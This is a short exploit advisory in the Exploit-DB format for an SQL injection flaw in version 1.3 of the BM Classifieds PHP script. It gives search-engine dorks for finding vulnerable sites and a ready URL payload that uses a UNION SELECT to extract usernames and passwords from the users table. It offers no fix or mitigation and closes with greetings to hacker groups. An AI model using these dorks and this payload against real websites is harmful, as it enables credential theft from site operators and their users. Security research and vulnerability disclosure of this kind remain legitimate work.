BM Classifieds Ads - SQL Injection

EDB-ID:

10314

CVE:

N/A




Platform:

PHP

Date:

2009-12-04


###############################

                                                  ALGERIAN HACKER
   **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            BM Classifieds ads SQL injection vulnerability
  [!] Author    : Dr.0rYX & Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://www.bmscripts.com/
  [+] script   : powered by BM Classifieds
  [+] Demo : http://classifieds.bmscripts.com/
  [+] Version() : 1.3
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"classifieds.php?cat="
               inurl::"showad.php?listingid="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/classifieds.php?cat=[N.A.S.T ]

  [ Exploit ]

  http://server/classifieds.php?cat=144+union+select+username,password,3,4+from+users

  [  GReet ]

  [+] :xcv-dz , CLAW , kader11000 ,le0n , exploit-db.com , ALL HACKERS MUSLIMS